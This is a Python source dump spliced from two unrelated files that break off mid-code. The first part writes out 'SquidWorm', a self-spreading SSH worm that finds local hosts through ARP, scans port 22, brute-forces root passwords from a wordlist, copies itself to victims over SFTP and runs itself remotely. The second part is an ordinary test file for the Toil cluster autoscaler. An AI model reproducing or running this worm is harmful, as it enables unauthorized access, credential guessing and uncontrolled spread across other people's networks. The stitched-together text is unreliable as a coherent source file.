self.get_args()
def genscript(self):
script = """
import paramiko, os, socket, threading, sys, time
print('''
_____ _ _ __ __ __ ___
/ ____| (_) | | \ \ / / /_ | / _ \
| (___ __ _ _ _ _ __| |_____\ \ /\ / /__ _ __ _ __ ___ | || | | |
\___ \ / _` | | | | |/ _` |______\ \/ \/ / _ \| '__| '_ ` _ \ | || | | |
____) | (_| | |_| | | (_| | \ /\ / (_) | | | | | | | | | || |_| |
|_____/ \__, |\__,_|_|\__,_| \/ \/ \___/|_| |_| |_| |_| |_(_)___/
| |
|_|
Script By DrSquid
This worm Spreads over local networks and exploits port 22.''')
class Marker:
def __init__(self, ip="0.0.0.0", port=42069):
self.ip = ip
self.port = port
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.bind((self.ip, self.port))
self.listener = threading.Thread(target=self.listen)
self.listener.start()
def listen(self):
while True:
try:
self.sock.listen()
conn, ip = self.sock.accept()
time.sleep(1)
conn.send("I have been infected with a worm.".encode())
conn.close()
except:
pass
class Worm:
def __init__(self, filetobecloned,victimfilename,passw_file,cfg_file=None):
self.own_ip = "192.168.0.115"
self.cfg_file = cfg_file
self.has_cfg = False
if self.cfg_file != None:
self.cfg_contents, self.ls_contents = self.cfg(self.cfg_file)
self.os_ls = ['windows','apple','linux']
self.ips = os.popen('arp -a').readlines()
self.possiblevictims = self.identify_victims()
self.passwords_cracked = 0
self.passwords_scanned = 0
self.clonefile = filetobecloned
self.fileonvictim = victimfilename
self.passw_file = passw_file
self.victims = []
self.ips_scanned = 0
print(f"[+] List of Possible Hosts: {self.possiblevictims}")
print("[+] Do CRTL+C To stop the script.")
print("\\n[+] Initiating Port Scan.....")
self.passwords = self.obtain_passw()
self.port_scanner = threading.Thread(target=self.begin_port_scan)
self.port_scanner.start()
def cfg(self, filename):
file = open(filename, "r")
contents = file.read()
file.close()
file = open(filename, "r")
ls_contents = file.readlines()
file.close()
if "CFGFORWORM" in contents:
self.has_cfg = True
print("[+] A Config file has been provided.")
return contents, ls_contents
else:
return None
def initiate_threads(self):
self.laster = threading.Thread(target=self.output_item)
self.laster.start()
while True:
try:
if self.ips_scanned == len(self.possiblevictims):
if len(self.victims) == 0:
print("\\n[+] No Hosts with Port 22 Open.")
else:
for ip in self.victims:
if self.has_cfg:
if ip in self.cfg_contents:
if ip not in self.victims:
print(f"[+] {ip} is in config file, but not in victim list.\n[+] Ignoring.........")
else:
for line in self.ls_contents:
if ip in line:
try:
ipcfg = line.split()
try:
username = ipcfg[1]
except:
username = "root"
try:
opsys = ipcfg[2]
if opsys not in self.os_ls:
opsys = "windows"
except:
opsys = "windows"
except:
pass
else:
username = "root"
opsys = "windows"
else:
username = "root"
opsys = "windows"
victim = threading.Thread(target=self.victimlogin, args=(ip, username, opsys))
victim.start()
break
except:
pass
def begin_port_scan(self):
for ip in self.possiblevictims:
try:
print(f"\\n[+] Scanning {ip}.....")
portscanner = threading.Thread(target=self.port_scan, args=(ip,))
portscanner.start()
except:
pass
self.initiate_threads()
def port_scan(self, ip):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, 22))
self.victims.append(ip)
print(f"\\n[!] {ip} has 22 as an open Port.")
except:
print(f"\\n[+] {ip} does not have 22 as an open port.")
s.close()
self.ips_scanned += 1
def obtain_passw(self):
with open(self.passw_file, "r") as file:
passwords = file.readlines()
return passwords
def identify_victims(self):
victims = []
if sys.platform == "win32":
for lines in self.ips:
try:
line = lines.split()
ip = line[0]
checker = int(ip[0])
victims.append(ip)
except:
pass
elif sys.platform == "darwin":
for lines in self.ips:
try:
line = lines.split()
ip = line[1]
ip = ip.strip('()')
checker = int(ip[0])
victims.append(ip)
except:
pass
return victims
def output_item(self):
while True:
try:
pass
except:
pass
def victimlogin(self, ip, username="root", opsys="windows"):
infected = False
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip,42069))
msg = s.recv(1024).decode()
s.close()
infected = True
self.passwords_cracked += 1
self.passwords_scanned += 1
print(f"[!] {ip} has already been infected!")
except:
infected = False
if not infected:
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
print(f"[+] Attempting to Brute Force Password for IP: {ip}")
flag = 0
for password in self.passwords:
try:
password = password.strip()
client.connect(ip, 22, username, password, auth_timeout=2)
flag = 1
break
except:
pass
if flag == 1:
self.passwords_cracked += 1
self.passwords_scanned += 1
print(f"\\n[!] {ip}'s Password has been Cracked!: {password}")
print(f"[!] Injecting file {self.clonefile} into Victim!")
sftp = client.open_sftp()
if opsys == 'apple':
sftp.put(self.clonefile, f"/Users/{username}/{self.fileonvictim}")
sftp.put(self.passw_file, f"/Users/{username}/{self.passw_file}")
if self.has_cfg:
sftp.put(self.cfg_file, f"/Users/{username}/{self.cfg_file}")
print(f"[!] Successfully Started {self.clonefile} On {ip}")
print(f"[+] If there is anything wrong with the connection, use: 'ssh {username}@{ip}' and procceed with: '{password}'")
if self.fileonvictim.endswith('.py'):
stdin, stdout, stderr = client.exec_command(
f"python3 /Users/{username}/{self.fileonvictim}")
stdin.close()
else:
stdin, stdout, stderr = client.exec_command(f"open /Users/{username}/{self.fileonvictim}")
stdin.close()
else:
sftp.put(self.clonefile, f"C:/Users/{username}/{self.fileonvictim}")
sftp.put(self.passw_file, f"C:/Users/{username}/{self.passw_file}")
if self.has_cfg:
sftp.put(self.cfg_file, f"C:/Users/{username}/{self.cfg_file}")
print(f"[!] File May Have been started on {ip}(Cmd command may have not been passed).")
print(f"[!] You can try logging into the Computer with cmd: ssh {username}@{ip}")
print(f"[!] And proceed with Password: {password}")
if self.fileonvictim.endswith('.py'):
stdin, stdout, stderr = client.exec_command(
f"python3 C:/Users/{username}/{self.fileonvictim}")
stdin.close()
else:
stdin, stdout, stderr = client.exec_command(f"start /B C:/Users/{username}/{self.fileonvictim}")
stdin.close()
client.close()
else:
print(f"\\n[?] {ip}'s Password was unable to be cracked.")
self.passwords_scanned += 1
marker = Marker()
worm = Worm("""+self.filename+""", """+self.filename+""", """+self.passlist+""", """+self.config+""")
"""
return script
def usage(self):
print("""
_____ _ _ __ __ __ ___
/ ____| (_) | | \ \ / / /_ | / _ \
| (___ __ _ _ _ _ __| |_____\ \ /\ / /__ _ __ _ __ ___ | || | | |
\___ \ / _` | | | | |/ _` |______\ \/ \/ / _ \| '__| '_ ` _ \ | || | | |
____) | (_| | |_| | | (_| | \ /\ / (_) | | | | | | | | | || |_| |
|_____/ \__, |\__,_|_|\__,_| \/ \/ \___/|_| |_| |_| |_| |_(_)___/
| |
|_|
Worm By DrSquid
This worm Spreads over local networks and exploits port 22.
[+] Option-Parsing Help:
[+] --pL, --passlist - Specifies the Brute-Forcing SSH File.
[+] --cF, --config - Specifies the config file for customized brute forcing.
[+] --fN, --filename - Specifies the name of the file created once brute forcing is successful.
[+] Note: The file that goes onto the remote computer will be the worm.
[+] Optional Arguements:
[+] --i, --info - Shows this message.
[+] Usage:""")
if sys.argv[0].endswith(".py"):
print("[+] python3 SquidWorm.py --pL <passlist> --fN <filename> --cf <cfgfile>")
print("[+] python3 SquidWorm.py --i")
else:
print("[+] SquidWorm --pL <passlist> --fN <filename> --cf <cfgfile>")
print("[+] SquidWorm --i")
def get_args(self):
self.opts = OptionParser()
self.opts.add_option("--pL","--passlist",dest="passlist")
self.opts.add_option("--cF","--config",dest="config")
self.opts.add_option("--fN","--filename",dest="filename")
self.opts.add_option("--i","--info",dest="info",action="store_true")
args, opt = self.opts.parse_args()
if args.info is not None:
self.usage()
else:
pass
if args.passlist is None:
self.usage()
else:
self.passlist = args.passlist
if args.config is None:
self.config = None
else:
self.config = args.config
if args.filename is None:
self.filename = "Worm.py"
else:
self.filename = args.filename
script = self.genscript()
file = open(self.filename,"w")
file.write(script)
file.close()
os.startfile(file.name)
optionparse = OptionParse()
|
clusterScalerTest.py
|
# Copyright (C) 2015-2018 Regents of the University of California
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from builtins import map
from builtins import object
from builtins import range
from past.utils import old_div
import time
import datetime
from contextlib import contextmanager
from threading import Thread, Event
import logging
import random
import types
import uuid
from collections import defaultdict
from mock import MagicMock
# Python 3 compatibility imports
from six.moves.queue import Empty, Queue
from six import iteritems
from toil.job import JobNode, Job
from toil.lib.humanize import human2bytes as h2b
from toil.test import ToilTest, slow
from toil.batchSystems.abstractBatchSystem import (AbstractScalableBatchSystem,
NodeInfo,
AbstractBatchSystem)
from toil.provisioners.node import Node
from toil.provisioners.abstractProvisioner import AbstractProvisioner, Shape
from toil.provisioners.clusterScaler import (ClusterScaler,
ScalerThread,
BinPackedFit,
NodeReservation)
from toil.common import Config, defaultTargetTime
logger = logging.getLogger(__name__)
# simplified c4.8xlarge (preemptable)
c4_8xlarge_preemptable = Shape(wallTime=3600,
memory=h2b('60G'),
cores=36,
disk=h2b('100G'),
preemptable=True)
# simplified c4.8xlarge (non-preemptable)
c4_8xlarge = Shape(wallTime=3600,
memory=h2b('60G'),
cores=36,
disk=h2b('100G'),
preemptable=False)
# simplified r3.8xlarge (non-preemptable)
r3_8xlarge = Shape(wallTime=3600,
memory=h2b('260G'),
cores=32,
disk=h2b('600G'),
preemptable=False)
# simplified t2.micro (non-preemptable)
t2_micro = Shape(wallTime=3600,
memory=h2b('1G'),
cores=1,
disk=h2b('8G'),
preemptable=False)
class BinPackingTest(ToilTest):
def setUp(self):
self.nodeShapes = [c4_8xlarge_preemptable, r3_8xlarge]
self.bpf = BinPackedFit(self.nodeShapes)
def testPackingOneShape(self):
"""Pack one shape and check that the resulting reservations look sane."""
self.bpf.nodeReservations[c4_8xlarge_preemptable] = [NodeReservation(c4_8xlarge_preemptable)]
self.bpf.addJobShape(Shape(wallTime=1000,
cores=2,
memory=h2b('1G'),
disk=h2b('2G'),
preemptable=True))
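        # The job occupies the reservation for its first 1000 seconds, leaving a
        # slice with the job's resources subtracted, followed by a 2600-second
        # slice in which the node's full capacity is free again.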
self.assertEqual(self.bpf.nodeReservations[r3_8xlarge], [])
self.assertEqual([x.shapes() for x in self.bpf.nodeReservations[c4_8xlarge_preemptable]],
[[Shape(wallTime=1000,
memory=h2b('59G'),
cores=34,
disk=h2b('98G'),
preemptable=True),
Shape(wallTime=2600,
memory=h2b('60G'),
cores=36,
disk=h2b('100G'),
preemptable=True)]])
def testSorting(self):
"""
Test that sorting is correct: preemptable, then memory, then cores, then disk,
then wallTime.
"""
shapeList = [c4_8xlarge_preemptable, r3_8xlarge, c4_8xlarge, c4_8xlarge,
t2_micro, t2_micro, c4_8xlarge, r3_8xlarge, r3_8xlarge, t2_micro]
shapeList.sort()
assert shapeList == [c4_8xlarge_preemptable,
t2_micro, t2_micro, t2_micro,
c4_8xlarge, c4_8xlarge, c4_8xlarge,
r3_8xlarge, r3_8xlarge, r3_8xlarge]
def testAddingInitialNode(self):
"""Pack one shape when no nodes are available and confirm that we fit one node properly."""
self.bpf.addJobShape(Shape(wallTime=1000,
cores=2,
memory=h2b('1G'),
disk=h2b('2G'),
preemptable=True))
self.assertEqual([x.shapes() for x in self.bpf.nodeReservations[c4_8xlarge_preemptable]],
[[Shape(wallTime=1000,
memory=h2b('59G'),
cores=34,
disk=h2b('98G'),
preemptable=True),
Shape(wallTime=2600,
memory=h2b('60G'),
cores=36,
disk=h2b('100G'),
preemptable=True)]])
def testLowTargetTime(self):
"""
Test that a low targetTime (0) parallelizes jobs aggressively (1000 queued jobs require
1000 nodes).
Ideally, low targetTime means: Start quickly and maximize parallelization after the
cpu/disk/mem have been packed.
Disk/cpu/mem packing is prioritized first, so we set job resource reqs so that each
t2.micro (1 cpu/8G disk/1G RAM) can only run one job at a time with its resources.
Each job is parametrized to take 300 seconds, so (the minimum of) 1 of them should fit into
each node's 0 second window, so we expect 1000 nodes.
"""
allocation = self.run1000JobsOnMicros(jobCores=1,
jobMem=h2b('1G'),
jobDisk=h2b('1G'),
jobTime=300,
globalTargetTime=0)
self.assertEqual(allocation, {t2_micro: 1000})
def testHighTargetTime(self):
"""
Test that a high targetTime (3600 seconds) maximizes packing within the targetTime.
Ideally, high targetTime means: Maximize packing within the targetTime after the
cpu/disk/mem have been packed.
Disk/cpu/mem packing is prioritized first, so we set job resource reqs so that each
t2.micro (1 cpu/8G disk/1G RAM) can only run one job at a time with its resources.
Each job is parametrized to take 300 seconds, so 12 of them should fit into each node's
3600 second window. 1000/12 = 83.33, so we expect 84 nodes.
"""
allocation = self.run1000JobsOnMicros(jobCores=1,
jobMem=h2b('1G'),
jobDisk=h2b('1G'),
jobTime=300,
globalTargetTime=3600)
self.assertEqual(allocation, {t2_micro: 84})
def testZeroResourceJobs(self):
"""
Test that jobs requiring zero cpu/disk/mem pack first, regardless of targetTime.
Disk/cpu/mem packing is prioritized first, so we set job resource reqs so that each
t2.micro (1 cpu/8G disk/1G RAM) can run a seemingly infinite number of jobs with its
resources.
Since all jobs should pack cpu/disk/mem-wise on a t2.micro, we expect only one t2.micro to
be provisioned. If we raise this, as in testLowTargetTime, it will launch 1000 t2.micros.
"""
allocation = self.run1000JobsOnMicros(jobCores=0,
jobMem=0,
jobDisk=0,
jobTime=300,
globalTargetTime=0)
self.assertEqual(allocation, {t2_micro: 1})
def testLongRunningJobs(self):
"""
Test that jobs with long run times (especially service jobs) are aggressively parallelized.
This is important, because services are one case where the degree of parallelization
really, really matters. If you have multiple services, they may all need to be running
simultaneously before any real work can be done.
Despite setting globalTargetTime=3600, this should launch 1000 t2.micros because each job's
estimated runtime (30000 seconds) extends well beyond 3600 seconds.
"""
allocation = self.run1000JobsOnMicros(jobCores=1,
jobMem=h2b('1G'),
jobDisk=h2b('1G'),
jobTime=30000,
globalTargetTime=3600)
self.assertEqual(allocation, {t2_micro: 1000})
def run1000JobsOnMicros(self, jobCores, jobMem, jobDisk, jobTime, globalTargetTime):
"""Test packing 1000 jobs on t2.micros. Depending on the targetTime and resources,
these should pack differently.
"""
nodeShapes = [t2_micro]
bpf = BinPackedFit(nodeShapes, targetTime=globalTargetTime)
for _ in range(1000):
bpf.addJobShape(Shape(wallTime=jobTime,
memory=jobMem,
cores=jobCores,
disk=jobDisk,
preemptable=False))
return bpf.getRequiredNodes()
def testPathologicalCase(self):
"""Test a pathological case where only one node can be requested to fit months' worth of jobs.
If the reservation is extended to fit a long job, and the
bin-packer naively searches through all the reservation slices
to find the first slice that fits, it will happily assign the
first slot that fits the job, even if that slot occurs days in
the future.
"""
# Add one job that partially fills an r3.8xlarge for 1000 hours
self.bpf.addJobShape(Shape(wallTime=3600000,
memory=h2b('10G'),
cores=0,
disk=h2b('10G'),
preemptable=False))
for _ in range(500):
# Add 500 CPU-hours worth of jobs that fill an r3.8xlarge
self.bpf.addJobShape(Shape(wallTime=3600,
memory=h2b('26G'),
cores=32,
disk=h2b('60G'),
preemptable=False))
# Hopefully we didn't assign just one node to cover all those jobs.
self.assertNotEqual(self.bpf.getRequiredNodes(), {r3_8xlarge: 1, c4_8xlarge_preemptable: 0})
def testJobTooLargeForAllNodes(self):
"""
If a job is too large for all node types, the scaler should print a
warning, but definitely not crash.
"""
# Takes more RAM than an r3.8xlarge
largerThanR3 = Shape(wallTime=3600,
memory=h2b('360G'),
cores=32,
disk=h2b('600G'),
preemptable=False)
self.bpf.addJobShape(largerThanR3)
# If we got here we didn't crash.
class ClusterScalerTest(ToilTest):
def setUp(self):
super(ClusterScalerTest, self).setUp()
self.config = Config()
self.config.targetTime = 1800
self.config.nodeTypes = ['r3.8xlarge', 'c4.8xlarge:0.6']
# Set up a stub provisioner with some nodeTypes and nodeShapes.
try:
# In Python 3 we can use a SimpleNamespace as a mock provisioner
self.provisioner = types.SimpleNamespace()
        except AttributeError:
            # In Python 2 there is no SimpleNamespace; use an empty class whose
            # instances accept arbitrary attributes instead
            class _StubProvisioner(object):
                pass
            self.provisioner = _StubProvisioner()
setattr(self.provisioner, 'nodeTypes', ['r3.8xlarge', 'c4.8xlarge'])
setattr(self.provisioner, 'nodeShapes', [r3_8xlarge,
c4_8xlarge_preemptable])
setattr(self.provisioner, 'setStaticNodes', lambda _, __: None)
setattr(self.provisioner, 'retryPredicate', lambda _: False)
self.leader = MockBatchSystemAndProvisioner(self.config, 1)
def testRounding(self):
"""
Test to make sure the ClusterScaler's rounding rounds properly.
"""
# Get a ClusterScaler
self.config.targetTime = 1
self.config.betaInertia = 0.0
self.config.maxNodes = [2, 3]
scaler = ClusterScaler(self.provisioner, self.leader, self.config)
# Exact integers round to themselves
self.assertEqual(scaler._round(0.0), 0)
self.assertEqual(scaler._round(1.0), 1)
self.assertEqual(scaler._round(-1.0), -1)
self.assertEqual(scaler._round(123456789101112.13), 123456789101112)
# Decimals other than X.5 round to the side they are closer to
self.assertEqual(scaler._round(1E-10), 0)
self.assertEqual(scaler._round(0.5 + 1E-15), 1)
self.assertEqual(scaler._round(-0.9), -1)
self.assertEqual(scaler._round(-0.4), 0)
# Decimals at exactly X.5 round away from 0
self.assertEqual(scaler._round(0.5), 1)
self.assertEqual(scaler._round(-0.5), -1)
self.assertEqual(scaler._round(2.5), 3)
self.assertEqual(scaler._round(-2.5), -3)
self.assertEqual(scaler._round(15.5), 16)
self.assertEqual(scaler._round(-15.5), -16)
self.assertEqual(scaler._round(123456789101112.5), 123456789101113)
def testMaxNodes(self):
"""
Set the scaler to be very aggressive, give it a ton of jobs, and
make sure it doesn't go over maxNodes.
"""
self.config.targetTime = 1
self.config.betaInertia = 0.0
self.config.maxNodes = [2, 3]
scaler = ClusterScaler(self.provisioner, self.leader, self.config)
jobShapes = [Shape(wallTime=3600,
cores=2,
memory=h2b('1G'),
disk=h2b('2G'),
preemptable=True)] * 1000
jobShapes.extend([Shape(wallTime=3600,
cores=2,
memory=h2b('1G'),
disk=h2b('2G'),
preemptable=False)] * 1000)
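        # getEstimatedNodeCounts takes the queued job shapes plus a map of nodes
        # already provisioned per shape (empty here); the estimate should be
        # capped at maxNodes for each node type.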
estimatedNodeCounts = scaler.getEstimatedNodeCounts(jobShapes, defaultdict(int))
self.assertEqual(estimatedNodeCounts[r3_8xlarge], 2)
self.assertEqual(estimatedNodeCounts[c4_8xlarge_preemptable], 3)
def testMinNodes(self):
"""
Without any jobs queued, the scaler should still estimate "minNodes" nodes.
"""
self.config.betaInertia = 0.0
self.config.minNodes = [2, 3]
scaler = ClusterScaler(self.provisioner, self.leader, self.config)
jobShapes = []
estimatedNodeCounts = scaler.getEstimatedNodeCounts(jobShapes, defaultdict(int))
self.assertEqual(estimatedNodeCounts[r3_8xlarge], 2)
self.assertEqual(estimatedNodeCounts[c4_8xlarge_preemptable], 3)
def testPreemptableDeficitResponse(self):
"""
When a preemptable deficit was detected by a previous run of the
loop, the scaler should add non-preemptable nodes to
compensate in proportion to preemptableCompensation.
"""
self.config.targetTime = 1
self.config.betaInertia = 0.0
self.config.maxNodes = [10, 10]
# This should mean that one non-preemptable node is launched
# for every two preemptable nodes "missing".
self.config.preemptableCompensation = 0.5
# In this case, we want to explicitly set up the config so
# that we can have preemptable and non-preemptable nodes of
# the same type. That is the only situation where
# preemptableCompensation applies.
self.config.nodeTypes = ['c4.8xlarge:0.6', 'c4.8xlarge']
self.provisioner.nodeTypes = ['c4.8xlarge', 'c4.8xlarge']
self.provisioner.nodeShapes = [c4_8xlarge_preemptable,
c4_8xlarge]
scaler = ClusterScaler(self.provisioner, self.leader, self.config)
# Simulate a situation where a previous run caused a
# "deficit" of 5 preemptable nodes (e.g. a spot bid was lost)
scaler.preemptableNodeDeficit['c4.8xlarge'] = 5
# Add a bunch of preemptable jobs (so the bin-packing
# estimate for the non-preemptable node should still be 0)
jobShapes = [Shape(wallTime=3600,
cores=2,
memory=h2b('1G'),
disk=h2b('2G'),
preemptable=True)] * 1000
estimatedNodeCounts = scaler.getEstimatedNodeCounts(jobShapes, defaultdict(int))
# We don't care about the estimated size of the preemptable
# nodes. All we want to know is if we responded to the deficit
# properly: 0.5 * 5 (preemptableCompensation * the deficit) = 3 (rounded up).
self.assertEqual(estimatedNodeCounts[self.provisioner.nodeShapes[1]], 3)
def testPreemptableDeficitIsSet(self):
"""
Make sure that updateClusterSize sets the preemptable deficit if
it can't launch preemptable nodes properly. That way, the
deficit can be communicated to the next run of
estimateNodeCount.
"""
# Mock out addNodes. We want to pretend it had trouble
# launching all 5 nodes, and could only launch 3.
self.provisioner.addNodes = MagicMock(return_value=3)
# Pretend there are no nodes in the cluster right now
self.provisioner.getProvisionedWorkers = MagicMock(return_value=[])
# In this case, we want to explicitly set up the config so
# that we can have preemptable and non-preemptable nodes of
# the same type. That is the only situation where
# preemptableCompensation applies.
self.config.nodeTypes = ['c4.8xlarge:0.6', 'c4.8xlarge']
self.provisioner.nodeTypes = ['c4.8xlarge', 'c4.8xlarge']
self.provisioner.nodeShapes = [c4_8xlarge_preemptable,
c4_8xlarge]
scaler = ClusterScaler(self.provisioner, self.leader, self.config)
estimatedNodeCounts = {c4_8xlarge_preemptable: 5, c4_8xlarge: 0}
scaler.updateClusterSize(estimatedNodeCounts)
self.assertEqual(scaler.preemptableNodeDeficit['c4.8xlarge'], 2)
self.provisioner.addNodes.assert_called_once()
# OK, now pretend this is a while later, and actually launched
# the nodes properly. The deficit should disappear
self.provisioner.addNodes = MagicMock(return_value=5)
scaler.updateClusterSize(estimatedNodeCounts)
self.assertEqual(scaler.preemptableNodeDeficit['c4.8xlarge'], 0)
def testNoLaunchingIfDeltaAlreadyMet(self):
"""
Check that the scaler doesn't try to launch "0" more instances if
the delta was able to be met by unignoring nodes.
"""
# We have only one node type for simplicity
self.provisioner.nodeTypes = ['c4.8xlarge']
self.provisioner.nodeShapes = [c4_8xlarge]
scaler = ClusterScaler(self.provisioner, self.leader, self.config)
# Pretend there is one ignored worker in the cluster
self.provisioner.getProvisionedWorkers = MagicMock(
return_value=[Node('127.0.0.1', '127.0.0.1', 'testNode',
datetime.datetime.now().isoformat(),
nodeType='c4.8xlarge', preemptable=True)])
scaler.ignoredNodes.add('127.0.0.1')
# Exercise the updateClusterSize logic
self.provisioner.addNodes = MagicMock()
scaler.updateClusterSize({c4_8xlarge: 1})
self.assertFalse(self.provisioner.addNodes.called,
"addNodes was called when no new nodes were needed")
self.assertEqual(len(scaler.ignoredNodes), 0,
"The scaler didn't unignore an ignored node when "
"scaling up")
def testBetaInertia(self):
# This is really high, but makes things easy to calculate.
self.config.betaInertia = 0.5
scaler = ClusterScaler(self.provisioner, self.leader, self.config)
# OK, smoothing things this much should get us 50% of the way to 100.
self.assertEqual(scaler.smoothEstimate(c4_8xlarge_preemptable, 100), 50)
# Now we should be at 75%.
self.assertEqual(scaler.smoothEstimate(c4_8xlarge_preemptable, 100), 75)
# We should eventually converge on our estimate as long as betaInertia is below 1.
for _ in range(1000):
scaler.smoothEstimate(c4_8xlarge_preemptable, 100)
self.assertEqual(scaler.smoothEstimate(c4_8xlarge_preemptable, 100), 100)
class ScalerThreadTest(ToilTest):
def _testClusterScaling(self, config, numJobs, numPreemptableJobs, jobShape):
"""
Test the ClusterScaler class with different patterns of job creation. Tests ascertain that
autoscaling occurs and that all the jobs are run.
"""
        # First do a simple test of creating 100 preemptable and non-preemptable jobs and check the
# jobs are completed okay, then print the amount of worker time expended and the total
# number of worker nodes used.
mock = MockBatchSystemAndProvisioner(config, secondsPerJob=2.0)
mock.start()
clusterScaler = ScalerThread(mock, mock, config)
clusterScaler.start()
try:
# Add 100 jobs to complete
list(map(lambda x: mock.addJob(jobShape=jobShape),
list(range(numJobs))))
list(map(lambda x: mock.addJob(jobShape=jobShape, preemptable=True),
list(range(numPreemptableJobs))))
# Add some completed jobs
for preemptable in (True, False):
if preemptable and numPreemptableJobs > 0 or not preemptable and numJobs > 0:
# Add 1000 random jobs
for _ in range(1000):
x = mock.getNodeShape(nodeType=jobShape)
iJ = JobNode(jobStoreID=1,
requirements=dict(
memory=random.choice(list(range(1, x.memory))),
cores=random.choice(list(range(1, x.cores))),
disk=random.choice(list(range(1, x.disk))),
preemptable=preemptable),
command=None,
jobName='testClusterScaling', unitName='')
clusterScaler.addCompletedJob(iJ, random.choice(list(range(1, x.wallTime))))
startTime = time.time()
# Wait while the cluster processes the jobs
while (mock.getNumberOfJobsIssued(preemptable=False) > 0
or mock.getNumberOfJobsIssued(preemptable=True) > 0
or mock.getNumberOfNodes() > 0 or mock.getNumberOfNodes(preemptable=True) > 0):
logger.debug("Running, non-preemptable queue size: %s, non-preemptable workers: %s, "
"preemptable queue size: %s, preemptable workers: %s" %
(mock.getNumberOfJobsIssued(preemptable=False),
mock.getNumberOfNodes(preemptable=False),
mock.getNumberOfJobsIssued(preemptable=True),
mock.getNumberOfNodes(preemptable=True)))
clusterScaler.check()
time.sleep(0.5)
logger.debug("We waited %s for cluster to finish" % (time.time() - startTime))
finally:
clusterScaler.shutdown()
mock.shutDown()
# Print some info about the autoscaling
logger.debug("Total-jobs: %s: Max-workers: %s, "
"Total-worker-time: %s, Worker-time-per-job: %s" %
(mock.totalJobs, sum(mock.maxWorkers.values()),
mock.totalWorkerTime,
old_div(mock.totalWorkerTime, mock.totalJobs) if mock.totalJobs > 0 else 0.0))
@slow
def testClusterScaling(self):
"""
Test scaling for a batch of non-preemptable jobs and no preemptable jobs (makes debugging
easier).
"""
config = Config()
# Make defaults dummy values
config.defaultMemory = 1
config.defaultCores = 1
config.defaultDisk = 1
# No preemptable nodes/jobs
config.maxPreemptableNodes = [] # No preemptable nodes
# Non-preemptable parameters
config.nodeTypes = [Shape(20, 10, 10, 10, False)]
config.minNodes = [0]
config.maxNodes = [10]
# Algorithm parameters
config.targetTime = defaultTargetTime
config.betaInertia = 0.1
config.scaleInterval = 3
self._testClusterScaling(config, numJobs=100, numPreemptableJobs=0,
jobShape=config.nodeTypes[0])
@slow
def testClusterScalingMultipleNodeTypes(self):
smallNode = Shape(20, 5, 10, 10, False)
mediumNode = Shape(20, 10, 10, 10, False)
largeNode = Shape(20, 20, 10, 10, False)
numJobs = 100
config = Config()
# Make defaults dummy values
config.defaultMemory = 1
config.defaultCores = 1
config.defaultDisk = 1
# No preemptable nodes/jobs
config.preemptableNodeTypes = []
config.minPreemptableNodes = []
config.maxPreemptableNodes = [] # No preemptable nodes
# Make sure the node types don't have to be ordered
config.nodeTypes = [largeNode, smallNode, mediumNode]
config.minNodes = [0, 0, 0]
config.maxNodes = [10, 10] # test expansion of this list
# Algorithm parameters
config.targetTime = defaultTargetTime
config.betaInertia = 0.1
config.scaleInterval = 3
mock = MockBatchSystemAndProvisioner(config, secondsPerJob=2.0)
clusterScaler = ScalerThread(mock, mock, config)
clusterScaler.start()
mock.start()
try:
# Add small jobs
list(map(lambda x: mock.addJob(jobShape=smallNode), list(range(numJobs))))
list(map(lambda x: mock.addJob(jobShape=mediumNode), list(range(numJobs))))
# Add medium completed jobs
for i in range(1000):
iJ = JobNode(jobStoreID=1,
requirements=dict(
memory=random.choice(range(smallNode.memory, mediumNode.memory)),
cores=mediumNode.cores,
disk=largeNode.cores,
preemptable=False),
command=None,
jobName='testClusterScaling', unitName='')
clusterScaler.addCompletedJob(iJ, random.choice(range(1, 10)))
while mock.getNumberOfJobsIssued() > 0 or mock.getNumberOfNodes() > 0:
logger.debug("%i nodes currently provisioned" % mock.getNumberOfNodes())
# Make sure there are no large nodes
self.assertEqual(mock.getNumberOfNodes(nodeType=largeNode), 0)
clusterScaler.check()
time.sleep(0.5)
finally:
clusterScaler.shutdown()
mock.shutDown()
# Make sure jobs ran on both the small and medium node types
self.assertTrue(mock.totalJobs > 0)
self.assertTrue(mock.maxWorkers[smallNode] > 0)
self.assertTrue(mock.maxWorkers[mediumNode] > 0)
self.assertEqual(mock.maxWorkers[largeNode], 0)
@slow
def testClusterScalingWithPreemptableJobs(self):
"""
Test scaling simultaneously for a batch of preemptable and non-preemptable jobs.
"""
config = Config()
jobShape = Shape(20, 10, 10, 10, False)
preemptableJobShape = Shape(20, 10, 10, 10, True)
# Make defaults dummy values
config.defaultMemory = 1
config.defaultCores = 1
config.defaultDisk = 1
# non-preemptable node parameters
config.nodeTypes = [jobShape, preemptableJobShape]
config.minNodes = [0, 0]
config.maxNodes = [10, 10]
# Algorithm parameters
config.targetTime = defaultTargetTime
config.betaInertia = 0.9
config.scaleInterval = 3
self._testClusterScaling(config, numJobs=100, numPreemptableJobs=100, jobShape=jobShape)
# noinspection PyAbstractClass
class MockBatchSystemAndProvisioner(AbstractScalableBatchSystem, AbstractProvisioner):
"""
Mimics a job batcher, provisioner and scalable batch system
"""
def __init__(self, config, secondsPerJob):
super(MockBatchSystemAndProvisioner, self).__init__('clusterName')
# To mimic parallel preemptable and non-preemptable queues
# for jobs we create two parallel instances of the following class
self.config = config
self.secondsPerJob = secondsPerJob
self.provisioner = self
self.batchSystem = self
self.nodeTypes = config.nodeTypes
self.nodeShapes = self.nodeTypes
self.nodeShapes.sort()
self.jobQueue = Queue()
self.updatedJobsQueue = Queue()
self.jobBatchSystemIDToIssuedJob = {}
self.totalJobs = 0 # Count of total jobs processed
self.totalWorkerTime = 0.0 # Total time spent in worker threads
self.toilMetrics = None
self.nodesToWorker = {} # Map from Node to instances of the Worker class
self.workers = {nodeShape: [] for nodeShape in
self.nodeShapes} # Instances of the Worker class
self.maxWorkers = {nodeShape: 0 for nodeShape in
self.nodeShapes} # Maximum number of workers
self.running = False
self.leaderThread = Thread(target=self._leaderFn)
def start(self):
